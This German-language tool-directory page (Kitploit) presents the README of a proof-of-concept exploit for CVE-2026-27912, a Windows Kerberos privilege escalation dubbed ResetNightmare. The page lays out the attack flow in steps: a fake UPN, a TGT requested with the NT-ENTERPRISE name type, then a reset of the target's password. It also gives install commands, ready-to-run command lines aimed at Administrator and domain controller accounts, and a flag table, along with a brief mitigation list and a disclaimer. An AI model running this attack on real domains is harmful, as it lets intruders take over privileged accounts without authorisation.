Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Kerberos-CVE-2026-27912 — PoC für CVE-2026-27912 - Windows-Kerberos-Privilegienausweitung (ResetNightmare). Unbefugtes Zurücksetzen von Passwörtern über eine Kerberos-Schwachstelle. Nur für Sicherheitsforschung. | Kitploit
Tools/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
Authentifizierung & AutorisierungPrivilege EscalationPasswortangriffeExploitationPenetrationstests
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

PoC für CVE-2026-27912 - Windows-Kerberos-Privilegienausweitung (ResetNightmare). Unbefugtes Zurücksetzen von Passwörtern über eine Kerberos-Schwachstelle. Nur für Sicherheitsforschung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
211vor 27 TagenNoch nicht geprüft

Kerberos-CVE-2026-27912

CVE-2026-27912 – Windows-Kerberos-Sicherheitsanfälligkeit (Erhöhung von Berechtigungen)

ResetNightmare – Nicht autorisiertes Zurücksetzen von Passwörtern durch einen Fehler im Kerberos-Kennwortänderungsprotokoll.


📋 Details

FeldWert
CVECVE-2026-27912
TitelWindows-Kerberos-Sicherheitsanfälligkeit (Erhöhung von Berechtigungen)
CVSS8.0 HOCH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWECWE-285: Unzureichende Autorisierung
Veröffentlicht14. April 2026
BehobenApril 2026

🔍 Angriffsablauf

root@kitploit:~
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 Voraussetzungen

  • Windows mit PowerShell
  • ActiveDirectory-Modul (Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe (Download von GhostPack/Rubeus)
  • Netzwerkzugriff auf den Domänencontroller

🚀 Installation

root@kitploit:~
# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 Verwendung

Basisangriff

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

Zielcomputerkonto

root@kitploit:~
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

Neues Konto erstellen

root@kitploit:~
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

Ausführlicher Modus

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 Argumente


🛡️ Gegenmaßnahmen

  1. Offiziellen Patch anwenden aus dem Microsoft-Sicherheitsupdate
  2. Netzwerk segmentieren, um den Zugriff auf benachbarte Netzwerke einzuschränken
  3. Prinzip der geringsten Rechte durchsetzen – UPN-Schreibberechtigungen einschränken
  4. Überwachen auf verdächtige UPN-Änderungen und Passwortzurücksetzungen

⚠️ Haftungsausschluss

Nur für autorisierte Sicherheitstests und zu Bildungs- und Forschungszwecken.

Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für den Missbrauch dieser Software.


📚 Referenzen

  • NVD: CVE-2026-27912
  • Microsoft Security Update Guide

👨‍💻 Autor

n0vax1337 / Sicherheitsforscher


📄 Lizenz

MIT-Lizenz – siehe LICENSE


Zuletzt aktualisiert: 2026

Tool herunterladen
FlagBeschreibungStandard
-t / --targetName des Zielkontoserforderlich
-p / --new-passwordNeues Passwort für das Zielerforderlich
-u / --upn-userKonto, auf dem die gefälschte UPN gesetzt wirderforderlich
-up / --upn-passwordPasswort für das UPN-Kontoerforderlich
-c / --computerUPNUser ist ein ComputerkontoFlag
-r / --rubeus-pathPfad zu Rubeus.exeRubeus.exe
-e / --encryptionUnterstützter VerschlüsselungstypAES256
-path / --create-pathOU-Pfad zum Erstellen eines neuen Kontos""
-d / --dcName des Domänencontrollersautomatisch erkennen
-v / --verboseAusführliche AusgabeFlag